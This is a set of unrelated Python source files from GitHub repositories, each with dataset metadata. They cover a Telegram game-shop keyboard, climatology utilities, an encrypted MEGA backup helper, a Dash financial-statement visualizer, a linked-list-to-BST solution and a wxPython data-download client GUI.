from aiogram.types import ReplyKeyboardRemove, \
ReplyKeyboardMarkup, KeyboardButton, \
InlineKeyboardMarkup, InlineKeyboardButton
i = {
"бургерок": {"type": "food", "price": 95, "value": 50, "emoji": "🍔"},
"сочок": {"type": "food", "price": 40, "value": 30, "emoji": "🧃"},
"пестик": {"type": "tool", "price": 10500, "emoji": "🔫"},
"отрава": {"type": "tool", "price": 500, "value": 50, "emoji": "🏴☠️"},
"динамит": {"type": "tool", "price": 1200, "value": 50, "emoji": "🧨"},
"домик": {"type": "asset", "price": 100000, "emoji": "🏠"},
"холизавод": {"type": "asset", "price": 1000000, "emoji": "🏭"}
}
def shop(page):
if page == "shop_main":
btn_1 = InlineKeyboardButton(f"Еда 🍔", callback_data="shop_food")
btn_2 = InlineKeyboardButton(f"Штуки 🔫", callback_data="shop_tools")
btn_3 = InlineKeyboardButton(f"Активы 🏡", callback_data="shop_assets")
btn_4 = InlineKeyboardButton(f"Эмодзи 💖", callback_data="shop_emoji")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3).add(btn_4)
if page == "shop_food":
btn_1 = InlineKeyboardButton(f"🍔\t\tбургерок\t\t💕{i['бургерок']['price']}", callback_data="buy_бургерок")
btn_2 = InlineKeyboardButton(f"🧃\t\tсочок\t\t💕{i['сочок']['price']}", callback_data="buy_сочок")
btn_3 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3)
if page == "shop_tools":
btn_1 = InlineKeyboardButton(f"🔫\t\tпестик\t\t💕{timevert(i['пестик']['price'])}", callback_data="buy_пестик")
btn_2 = InlineKeyboardButton(f"🏴☠️\t\tотрава\t\t💕{timevert(i['отрава']['price'])}", callback_data="buy_отрава")
btn_3 = InlineKeyboardButton(f"🧨\t\tдинамит\t\t💕{timevert(i['динамит']['price'])}", callback_data="buy_динамит")
btn_4 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3).add(btn_4)
if page == "shop_assets":
btn_1 = InlineKeyboardButton(f"🏠\t\tдомик\t\t💕{timevert(i['домик']['price'])}", callback_data="buy_домик")
btn_2 = InlineKeyboardButton(f"💒\t\tхолизавод\t\t💕{timevert(i['холизавод']['price'])}", callback_data="buy_холизавод")
btn_3 = InlineKeyboardButton(f"🏩\t\tотель\t\t💕(скоро)", callback_data="buy_отель")
btn_4 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_1).add(btn_2).add(btn_3).add(btn_4)
if page == "shop_emoji":
btn_4 = InlineKeyboardButton(f"🙅♂️\t\tназад", callback_data="shop_back")
inline = InlineKeyboardMarkup().add(btn_4)
return inline
| marcoflacko/holy | shop.py | shop.py | py | 3,052 | python | en | code | 0 | github-code | 50 |
13114569053 | from dotenv import load_dotenv
from os import getenv, makedirs
from os.path import isdir
from shutil import rmtree
from datetime import datetime, timedelta, date
from collections import Counter
from multiprocessing import cpu_count
def get_uf_file(path_file):
"""
Retorna a UF a qual um arquivo é referente
"""
with open(path_file, encoding=get_encoding_files()) as readfile:
readfile.readline()
line = readfile.readline().replace('\n', '')
uf_file = line[-2:]
return uf_file
def get_encoding_files():
load_dotenv()
default_encoding = getenv('DEFAULT_ENCODING')
return default_encoding
def get_env(env_name):
load_dotenv()
default_encoding = getenv(env_name)
return default_encoding
def transform_line_write(list_values):
output_separator = getenv('OUTPUT_SEPARATOR')
line_write = f'{output_separator}'.join(list_values)
line_write += '\n'
return line_write
def create_directory(directory_name):
if isdir(directory_name):
rmtree(directory_name)
makedirs(directory_name)
def calc_average_values(list_values):
average = []
sum_values = 0
length_main_list = len(list_values)
if len(list_values) > 0:
length_sublists = len(list_values[0])
for index_sublist in range(length_sublists):
for index_main_list in range(length_main_list):
sum_values += format_float(list_values[index_main_list][index_sublist], default_value=0)
average.append(str(round(sum_values/length_main_list, 2)))
sum_values = 0
return average
else:
return []
def calc_average_values_forecast(list_values):
average = []
sum_values = 0
sum_values_string = []
length_main_list = len(list_values)
length_sublists = len(list_values[0])
for index_sublist in range(length_sublists):
for index_main_list in range(length_main_list):
if index_sublist == 0:
sum_values_string.append(list_values[index_main_list][index_sublist])
else:
sum_values += format_float(list_values[index_main_list][index_sublist], default_value=0)
if index_sublist == 0:
average.append(Counter(sum_values_string).most_common(1)[0][0])
sum_values_string.clear()
else:
average.append(str(round(sum_values/length_main_list, 2)))
sum_values = 0
return average
def format_float(value, default_value=None):
try:
return float(value)
except:
return default_value
def format_int(value):
try:
return int(value)
except:
return None
def convert_date_format(date_str, date_format='%Y/%m/%d'):
try:
new_date = datetime.strptime(date_str, date_format)
return new_date
except:
return None
def separate_date(date_str):
converted_date = convert_date_format(date_str)
if converted_date:
year = converted_date.year
month = converted_date.month
day = converted_date.day
return year, month, day
else:
return [None, None, None]
def get_competence(date_str, date_format='%d/%m/%Y', result_format='%Y/%m/%d'):
converted_date = convert_date_format(date_str, date_format)
if converted_date:
competence = converted_date.replace(day=1)
return competence.strftime(result_format)
else:
return None
def get_month(str_date):
converted_date = convert_date_format(str_date)
if converted_date:
return str(converted_date.month)
else:
return ''
def get_day(str_date):
converted_date = convert_date_format(str_date)
if converted_date:
return str(converted_date.day)
else:
return ''
def get_first_and_last_day_week(str_date):
converted_date = convert_date_format(str_date)
number_days = timedelta(days=converted_date.weekday() + 1)
if number_days.days == 7:
start = converted_date
end = start + timedelta(days=6)
else:
start = converted_date - timedelta(days=converted_date.weekday() + 1)
end = start + timedelta(days=6)
return str(start.strftime('%Y/%m/%d')), str(end.strftime('%Y/%m/%d'))
def get_number_free_threads():
"""
Retorna a metade da quantidade de theads disponíveis na maquina
"""
try:
return cpu_count()/2
except:
return 1
def are_valid_values(*args):
for value in args:
if value is None:
return False
return True
def is_date(value, format_date='%d/%m/%Y'):
try:
datetime.strptime(value, format_date)
return True
except:
return False
def is_valid_time(time):
try:
if str(time).isdigit():
if int(time) < 0 or int(time) > 23:
return False
else:
return True
else:
return False
except:
return False
def convert_time_days(value):
"""
Processa o horário do dia solicitado
"""
result = []
for sublist in str(value).split(','):
if '-' in sublist:
range_sublist = str(sublist).split('-')
if len(range_sublist) == 2:
init_range = range_sublist[0]
end_range = range_sublist[1]
if is_valid_time(init_range) and is_valid_time(end_range):
range_times = range(int(init_range), int(end_range)+1)
else:
return []
else:
return []
else:
range_times = [sublist]
for time in range_times:
if is_valid_time(time):
result.append(int(time))
else:
return []
result = list(set(result))
result.sort()
return result
def format_int_to_time(value):
string_time = f'{str(value).zfill(2)}:00:00'
# return datetime.strptime(string_time, '%H:%M:%S').time()
return string_time
def format_str_to_date(value):
return datetime.strptime(value, '%d/%m/%Y').date()
def get_future_day(number_of_days):
current_day = datetime.now()
future_day = current_day + timedelta(days=int(number_of_days))
return future_day.strftime('%d/%m/%Y')
def get_current_day():
current_day = datetime.now()
return current_day.strftime('%d/%m/%Y')
def question_user(message, limit_response=None, response_is_dir=False, int_response=False):
option = ''
while not option:
if limit_response:
response = input(f'{message} => ')
if int_response:
response = format_int(response)
if response in limit_response:
option = response
else:
print('Informe uma opção válida!')
elif response_is_dir:
response = input(f'{message} => ')
if isdir(response):
option = response
else:
print('Informe um caminho válido!')
elif int_response:
response = input(f'{message} => ')
if format_int(response):
option = format_int(response)
else:
print('Informe um valor válido válido!')
else:
option = input(f'{message} => ')
break
return option
| marcoswb/brazilian-climatology | utils/functions.py | functions.py | py | 7,367 | python | en | code | 0 | github-code | 50 |
31634699775 | try:from .internetBytesIO import *
except ImportError: from internetBytesIO import *
from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES, PKCS1_OAEP
import os, subprocess
def getBackupAccount():
f=open(os.path.join(BASE_DIR_PATH, "data", "backupAccount"), "r")
jso = f.read()
f.close()
return jso
account = getBackupAccount()
m=mega_from_json(json.loads(account))
megafs_folder = m.find('megafs')
def encrypt_for_backup(data):
file_out = BytesIO()
recipient_key = RSA.import_key(open( os.path.join(BASE_DIR_PATH, "data", "publickey.crt") ).read())
session_key = get_random_bytes(16)
# Encrypt the session key with the public RSA key
cipher_rsa = PKCS1_OAEP.new(recipient_key)
enc_session_key = cipher_rsa.encrypt(session_key)
# Encrypt the data with the AES session key
cipher_aes = AES.new(session_key, AES.MODE_EAX)
ciphertext, tag = cipher_aes.encrypt_and_digest(data)
[ file_out.write(x) for x in (enc_session_key, cipher_aes.nonce, tag, ciphertext) ]
file_out.seek(0)
return file_out
def zipThisBitch(extra=None):
print("Backing up files")
lst = [os.path.join(BASE_DIR_PATH, f) for f in os.listdir(BASE_DIR_PATH) if f!="img_mount_point"]
p = subprocess.Popen(["zip", "-r", "-"]+lst,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
zipped = encrypt_for_backup(p.stdout.read())
while True:
try: return m.upload(str(time.ctime()) +(extra if extra is not None else "")+".zip", megafs_folder[0], byteio=zipped)
except Exception as e: print("Backing up err",e)
# file = m.upload("megafs/wow.txt", folder[0], byteio=BytesIO(b"asdf")) | HeronErin/hermesfs | src/backupUtils.py | backupUtils.py | py | 1,645 | python | en | code | 0 | github-code | 50 |
23646206849 | import numpy as np
import pandas as pd
import plotly.graph_objects as go
import dash_core_components as dcc
import dash_html_components as html
from jupyter_dash import JupyterDash
from plotly.subplots import make_subplots
from dash.dependencies import Input, Output
from visualizers import BaseVisualizer
class AssetDebtVisualizer(BaseVisualizer):
def __init__(self, stock_id):
super(AssetDebtVisualizer, self).__init__()
self.load_stock_info()
self.stock_id = stock_id
self.company_name = self.stock_info[self.stock_info.code ==
stock_id].name.values[0]
self.company_type = self.stock_info[self.stock_info.code ==
stock_id].company_type.values[0]
self.data = self.create_df(stock_id)
self.features = self.data.columns[1:]
def create_df(self, stock_id):
df = pd.read_csv(
f"{self.root}/asset_debt/{self.company_type}_asset_debt.csv",
header=[0, 1])
df = df[df[('year', 'code')] == stock_id]
del df[('year', 'code')]
data_all = []
seasons = np.unique([col[0] for col in df.columns])
features = [col[1] for col in df.columns if col[0] == seasons[0]]
col_names = ['季'] + [col for col in features]
for feature in features:
selected_columns = [(season, feature) for season in seasons]
df1 = df[selected_columns]
df1.columns = df1.columns.droplevel(1)
data_all.append(df1.T)
data_all = pd.concat(data_all, axis=1).astype(float).reset_index()
data_all.columns = col_names
return data_all
def run_dash(self):
pbr = '每股參考淨值'
share_capital = '股本'
asset_debt_table = self.plot_table(self.data.drop(columns=[pbr, share_capital]))
one_line_plot = make_subplots(rows=3,
cols=1,
subplot_titles=('負債比率', pbr, share_capital),
shared_xaxes=True)
one_line_plot.append_trace(go.Scatter(
x=self.data['季'],
y=100 * (self.data['負債總額'] / self.data['資產總額']).values.reshape(-1),
mode='lines+markers'),
row=1,
col=1)
one_line_plot.append_trace(go.Scatter(
x=self.data['季'],
y=self.data[pbr].values.reshape(-1),
mode='lines+markers'),
row=2,
col=1)
one_line_plot.append_trace(go.Scatter(
x=self.data['季'],
y=(self.data[share_capital]/10000).values.reshape(-1),
mode='lines+markers'),
row=3,
col=1)
one_line_plot.update_yaxes(title_text='%', row=1, col=1)
one_line_plot.update_yaxes(title_text='$NTD', row=2, col=1)
one_line_plot.update_yaxes(title_text='$NTD 萬', row=3, col=1)
one_line_plot.update_layout(showlegend=False)
app = JupyterDash(__name__)
app.layout = html.Div([
html.H1(f'{self.stock_id} {self.company_name}',
style=self.title_style),
dcc.Graph(id='asset_debt_line_plot',
style={
'width': '900px',
'height': '80%',
'text-align': 'center'
}),
dcc.Checklist(id='checkbox',
options=[{
'label': self.features[i],
'value': i
} for i in range(len(self.features))
if self.features[i] != pbr and self.features[i] != share_capital],
value=[
i for i in range(len(self.features))
if self.features[i] != pbr and self.features[i] != share_capital
],
style={
'width': '900px',
'text-align': 'center'
}),
dcc.Graph(figure=one_line_plot,
style={
'width': '900px',
'height': '10%',
'text-align': 'center'
}),
html.Div(
[asset_debt_table],
style={
'width': '900px',
'text-align': 'center',
'marginTop': '50px',
'marginBottom': '50px'
})
],
style=self.main_div_style)
@app.callback(Output('asset_debt_line_plot', 'figure'),
[Input('checkbox', 'value')])
def update_line_chart(contents):
features = [self.features[i] for i in contents]
fig = go.Figure()
for col in features:
fig.add_trace(
go.Scatter(x=self.data['季'],
y=self.data[col].values.reshape(-1) / 1e4,
mode='lines+markers',
name=col))
fig.update_layout(title={
'y': 0.9,
'x': 0.5,
'xanchor': 'center',
'yanchor': 'top',
'text': '近年資產負債表'
},
yaxis_title='$NTD 萬')
return fig
app.run_server(mode='external')
| yuhsuanyang/stock_market_analysis | code/visualizers/asset_debt_visualizer.py | asset_debt_visualizer.py | py | 5,608 | python | en | code | 1 | github-code | 50 |
28076365082 | # -*- coding: utf-8 -*-
"""
@Author 坦克手贝塔
@Date 2022/2/24 16:36
"""
"""
给定一个单链表,其中的元素按升序排序,将其转换为高度平衡的二叉搜索树。
本题中,一个高度平衡二叉树是指一个二叉树每个节点 的左右两个子树的高度差的绝对值不超过 1。
给定的有序链表: [-10, -3, 0, 5, 9]
一个可能的答案是:[0, -3, 9, -10, null, 5]
"""
"""
思路:快慢指针每次找中间一个即可
"""
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, val=0, next=None):
self.val = val
self.next = next
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution(object):
@staticmethod
def sorted_list_to_bst(head):
"""
:type head: Optional[ListNode]
:rtype: Optional[TreeNode]
"""
def get_mid(left, right):
fast = slow = left
while fast != right and fast.next != right:
fast = fast.next.next
slow = slow.next
return slow
def build_tree(left, right):
if left == right:
return None
mid = get_mid(left, right)
root = TreeNode(mid.val)
root.left = build_tree(left, mid)
root.right = build_tree(mid.next, right)
return root
return build_tree(head, None)
| TankManBeta/LeetCode-Python | problem109_medium.py | problem109_medium.py | py | 1,560 | python | en | code | 0 | github-code | 50 |
33363570959 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# Michael Beck
#
# Core
import json
import logging
import datetime
import os
import sys
# Third party
import wx
import wx.adv
# Own
from client.commands import bind_command, check_cmd, sample_cmd, download_cmd, \
login_cmd, logout_cmd, update_archives_cmd
if getattr(sys, 'frozen', False):
Current_Path = os.path.dirname(sys.executable)
else:
Current_Path = str(os.path.dirname(__file__))
VERSION = "1.0.1"
SAMPLE_SIZE = 20
JSON_LOCATION = os.path.join(Current_Path, "parameters.json")
METADATA_LOCATION = os.path.join(Current_Path, "metadata.json")
class Main(wx.Frame):
def __init__(self, *args, **kwds):
# Confirm License
license_dialog = LicenseDialog(None, wx.ID_ANY, "")
if license_dialog.ShowModal() != wx.ID_OK:
self.logger.warning("License was not agreed on.")
license_dialog.Destroy()
return None
license_dialog.Destroy()
with open(METADATA_LOCATION, "r") as f:
metadata = json.load(f) # TODO: Have a way of getting this from the server instead
# Setup logger
self.logger = logging.getLogger("Client.Main")
self.logger.setLevel(logging.DEBUG)
# Setup Frame
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.SetSize((555, 539))
self.SetTitle("TerraByte Client")
self.tabs = wx.Notebook(self, wx.ID_ANY)
self.eaglidata_tab = wx.Panel(self.tabs, wx.ID_ANY)
self.tabs.AddPage(self.eaglidata_tab, "EAGL-I Data")
sizer_1 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_2 = wx.FlexGridSizer(3, 4, 5, 5)
sizer_1.Add(grid_sizer_2, 1, wx.EXPAND | wx.LEFT, 5)
label_start_date = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Start Date:")
grid_sizer_2.Add(label_start_date, 0, wx.EXPAND, 0)
self.datepicker_start_date = wx.adv.DatePickerCtrl(
self.eaglidata_tab,
wx.ID_ANY,
dt=wx.DateTime(17, 3, year=2020),
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_2.Add(self.datepicker_start_date, 0, wx.EXPAND, 0)
label_end_date = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "End Date:")
grid_sizer_2.Add(label_end_date, 0, wx.EXPAND, 0)
today = wx.DateTime().SetToCurrent()
self.datepicker_end_date = wx.adv.DatePickerCtrl(
self.eaglidata_tab,
wx.ID_ANY,
dt=today,
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_2.Add(self.datepicker_end_date, 0, wx.EXPAND, 0)
label_age_min = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Min. age in days:")
grid_sizer_2.Add(label_age_min, 0, wx.EXPAND, 0)
self.spin_age_min = wx.SpinCtrl(self.eaglidata_tab, wx.ID_ANY, "0", min=0, max=1000)
grid_sizer_2.Add(self.spin_age_min, 0, wx.EXPAND, 0)
label_age_max = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Max. age in days:")
grid_sizer_2.Add(label_age_max, 0, wx.EXPAND, 0)
self.spin_age_max = wx.SpinCtrl(self.eaglidata_tab, wx.ID_ANY, "1000", min=0, max=1000)
grid_sizer_2.Add(self.spin_age_max, 0, wx.EXPAND, 0)
label_plants = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Plants:")
grid_sizer_2.Add(label_plants, 0, wx.EXPAND, 0)
self.check_list_plants = wx.CheckListBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=metadata["eagli_plants"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT
)
self.check_list_plants.SetMinSize((113, 80))
grid_sizer_2.Add(self.check_list_plants, 0, wx.EXPAND, 0)
sizer_6 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_2.Add(sizer_6, 1, wx.EXPAND, 0)
label_plant_id = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Plant ID:")
sizer_6.Add(label_plant_id, 0, wx.EXPAND, 0)
label_resolution_minimum = wx.StaticText(
self.eaglidata_tab,
wx.ID_ANY,
"Min. Resolution (px):"
)
sizer_6.Add(label_resolution_minimum, 0, wx.TOP, 10)
label_resolution_maximum = wx.StaticText(
self.eaglidata_tab, wx.ID_ANY, "Max. Resolution (px):"
)
sizer_6.Add(label_resolution_maximum, 0, wx.TOP, 5)
label_perspective = wx.StaticText(
self.eaglidata_tab, wx.ID_ANY, "Perspective:"
)
sizer_6.Add(label_perspective, 0, wx.TOP, 20)
sizer_7 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_2.Add(sizer_7, 1, wx.EXPAND, 0)
self.text_plant_id = wx.TextCtrl(self.eaglidata_tab, wx.ID_ANY, "")
sizer_7.Add(self.text_plant_id, 0, wx.EXPAND, 0)
self.spin_resolution_min = wx.SpinCtrl(
self.eaglidata_tab, wx.ID_ANY, "0", min=0, max=4000
)
sizer_7.Add(self.spin_resolution_min, 0, wx.EXPAND, 0)
self.spin_resolution_max = wx.SpinCtrl(
self.eaglidata_tab, wx.ID_ANY, "4000", min=0, max=4000
)
sizer_7.Add(self.spin_resolution_max, 0, wx.EXPAND, 0)
self.perspective_box = wx.RadioBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=["Any", "Top-down", "Oblique", "Profile"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT,
majorDimension=1
)
'''self.perspective_box = wx.CheckListBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=["Top-down", "Oblique", "Profile"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT
)'''
self.perspective_box.SetMinSize((113, 110))
sizer_7.Add(self.perspective_box, 0, wx.EXPAND, 0)
static_line_1 = wx.StaticLine(self.eaglidata_tab, wx.ID_ANY)
sizer_1.Add(static_line_1, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_5 = wx.GridSizer(4, 2, 0, 0)
sizer_1.Add(sizer_5, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
self.checkbox_single_plant_images = wx.CheckBox(
self.eaglidata_tab, wx.ID_ANY, "Single Plant Images"
)
self.checkbox_single_plant_images.SetValue(1)
sizer_5.Add(self.checkbox_single_plant_images, 0, wx.EXPAND, 0)
label_archived_queries = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Archived Queries:")
sizer_5.Add(label_archived_queries, 0, wx.EXPAND, 0)
self.checkbox_multiple_plant_images = wx.CheckBox(
self.eaglidata_tab, wx.ID_ANY, "Multiple Plant Images"
)
sizer_5.Add(self.checkbox_multiple_plant_images, 0, wx.EXPAND, 0)
plant_list = [""]
plant_list.extend(metadata["eagli_archives"])
self.combo_box_archived_queries = wx.ComboBox(
self.eaglidata_tab,
wx.ID_ANY,
choices=plant_list,
style=wx.CB_DROPDOWN | wx.CB_READONLY | wx.CB_SORT
)
sizer_5.Add(self.combo_box_archived_queries, 0, wx.EXPAND, 0)
self.checkbox_bounding_box_images = wx.CheckBox(
self.eaglidata_tab, wx.ID_ANY, "Bounding Box Images"
)
sizer_5.Add(self.checkbox_bounding_box_images, 0, wx.EXPAND, 0)
sizer_5.Add((0, 0), 0, 0, 0)
self.checkbox_json_files = wx.CheckBox(self.eaglidata_tab, wx.ID_ANY, "JSON Files")
sizer_5.Add(self.checkbox_json_files, 0, wx.EXPAND, 0)
sizer_5.Add((0, 0), 0, 0, 0)
static_line_2 = wx.StaticLine(self.eaglidata_tab, wx.ID_ANY)
sizer_1.Add(static_line_2, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_3 = wx.BoxSizer(wx.VERTICAL)
sizer_1.Add(sizer_3, 1, wx.EXPAND, 0)
result_header_label = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "Result:")
sizer_3.Add(result_header_label, 0, 0, 0)
self.result_label = wx.StaticText(self.eaglidata_tab, wx.ID_ANY, "")
sizer_3.Add(self.result_label, 0, wx.EXPAND, 0)
grid_sizer_1 = wx.GridSizer(2, 3, 0, 0)
sizer_1.Add(grid_sizer_1, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
self.check_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Check Query")
self.check_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.check_button, 0, 0, 0)
self.sample_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Get Sample")
self.sample_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.sample_button, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.download_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Download")
self.download_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.download_button, 0, wx.ALIGN_RIGHT, 0)
self.credentials_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Set Credentials")
self.credentials_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.credentials_button, 0, 0, 0)
self.sample_path_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Set Sample Path")
self.sample_path_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.sample_path_button, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.download_path_button = wx.Button(self.eaglidata_tab, wx.ID_ANY, "Set Download Path")
self.download_path_button.SetMinSize((125, 26))
grid_sizer_1.Add(self.download_path_button, 0, wx.ALIGN_RIGHT, 0)
self.fielddata_tab = wx.Panel(self.tabs, wx.ID_ANY)
self.tabs.AddPage(self.fielddata_tab, "Fielddata")
sizer_2 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_3 = wx.FlexGridSizer(3, 4, 5, 5)
sizer_2.Add(grid_sizer_3, 1, wx.EXPAND | wx.LEFT, 5)
label_start_date_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "Start Date:")
grid_sizer_3.Add(label_start_date_field, 0, 0, 0)
self.datepicker_start_date_field = wx.adv.DatePickerCtrl(
self.fielddata_tab,
wx.ID_ANY,
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_3.Add(self.datepicker_start_date_field, 0, wx.EXPAND, 0)
label_end_date_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "End Date:")
grid_sizer_3.Add(label_end_date_field, 0, 0, 0)
self.datepicker_end_date_field = wx.adv.DatePickerCtrl(
self.fielddata_tab,
wx.ID_ANY,
style=wx.adv.DP_DEFAULT | wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY
)
grid_sizer_3.Add(self.datepicker_end_date_field, 0, wx.EXPAND, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
label_plants_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "Plants:")
grid_sizer_3.Add(label_plants_field, 0, 0, 0)
self.check_list_plants_field = wx.CheckListBox(
self.fielddata_tab,
wx.ID_ANY,
choices=metadata["field_plants"],
style=wx.LB_ALWAYS_SB | wx.LB_EXTENDED | wx.LB_SORT
)
self.check_list_plants_field.SetMinSize((113, 80))
grid_sizer_3.Add(self.check_list_plants_field, 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
grid_sizer_3.Add((0, 0), 0, 0, 0)
static_line_3 = wx.StaticLine(self.fielddata_tab, wx.ID_ANY)
sizer_2.Add(static_line_3, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_10 = wx.GridSizer(4, 2, 0, 0)
sizer_2.Add(sizer_10, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
sizer_10.Add((0, 0), 0, 0, 0)
label_archived_queries_field = wx.StaticText(
self.fielddata_tab, wx.ID_ANY, "Archived Queries:"
)
sizer_10.Add(label_archived_queries_field, 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
plant_list = [""]
plant_list.extend(metadata["field_archives"])
self.combo_box_archived_queries_field = wx.ComboBox(
self.fielddata_tab,
wx.ID_ANY,
choices=plant_list,
style=wx.CB_DROPDOWN | wx.CB_READONLY | wx.CB_SORT
)
sizer_10.Add(self.combo_box_archived_queries_field, 0, wx.EXPAND, 0)
sizer_10.Add((0, 0), 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
sizer_10.Add((0, 0), 0, 0, 0)
static_line_4 = wx.StaticLine(self.fielddata_tab, wx.ID_ANY)
sizer_2.Add(static_line_4, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 8)
sizer_4 = wx.BoxSizer(wx.VERTICAL)
sizer_2.Add(sizer_4, 1, wx.EXPAND, 0)
result_header_label_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "Result:")
sizer_4.Add(result_header_label_field, 0, 0, 0)
self.result_label_field = wx.StaticText(self.fielddata_tab, wx.ID_ANY, "")
sizer_4.Add(self.result_label_field, 0, wx.EXPAND, 0)
grid_sizer_4 = wx.GridSizer(2, 3, 0, 0)
sizer_2.Add(grid_sizer_4, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
self.check_button_field = wx.Button(self.fielddata_tab, wx.ID_ANY, "Check Query")
self.check_button_field.SetMinSize((125, 26))
grid_sizer_4.Add(self.check_button_field, 0, 0, 0)
self.sample_button_field = wx.Button(self.fielddata_tab, wx.ID_ANY, "Get Sample")
self.sample_button_field.SetMinSize((125, 26))
grid_sizer_4.Add(self.sample_button_field, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.download_button_field = wx.Button(self.fielddata_tab, wx.ID_ANY, "Download")
self.download_button_field.SetMinSize((125, 26))
grid_sizer_4.Add(self.download_button_field, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_4.Add((0, 0), 0, 0, 0)
grid_sizer_4.Add((0, 0), 0, 0, 0)
grid_sizer_4.Add((0, 0), 0, 0, 0)
self.info_tab = wx.Panel(self.tabs, wx.ID_ANY)
self.tabs.AddPage(self.info_tab, "Info")
sizer_8 = wx.BoxSizer(wx.VERTICAL)
label_version = wx.StaticText(self.info_tab, wx.ID_ANY, "Version: "+VERSION)
sizer_8.Add(label_version, 0, 0, 0)
label_author = wx.StaticText(
self.info_tab,
wx.ID_ANY,
"The TerraByte Client is developed by Michael Beck. "
"Contact: m.beck@uwinnipeg.ca"
)
sizer_8.Add(label_author, 0, 0, 0)
self.hyperlink_citation_info = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"Citation Information and Terms of use",
"https://terrabyte.acs.uwinnipeg.ca/resources.html#tools"
)
sizer_8.Add(self.hyperlink_citation_info, 0, 0, 0)
self.hyperlink_parameter_explanation = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"Manual",
"https://terrabyte.acs.uwinnipeg.ca/assets/programs/TB_Client_Manual.pdf"
)
sizer_8.Add(self.hyperlink_parameter_explanation, 0, 0, 0)
self.video_tutorial = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"Video Explanation",
"https://youtu.be/2MX4ascCTq0"
)
sizer_8.Add(self.video_tutorial, 0, 0, 0)
self.github = wx.adv.HyperlinkCtrl(
self.info_tab,
wx.ID_ANY,
"GitHub",
"https://github.com/UWDigitalAg/TerraByte_Client"
)
sizer_8.Add(self.github, 0, 0, 0)
self.info_tab.SetSizer(sizer_8)
grid_sizer_3.AddGrowableRow(0)
grid_sizer_3.AddGrowableRow(1)
grid_sizer_3.AddGrowableCol(0)
grid_sizer_3.AddGrowableCol(2)
grid_sizer_3.AddGrowableCol(3)
self.fielddata_tab.SetSizer(sizer_2)
grid_sizer_2.AddGrowableRow(0)
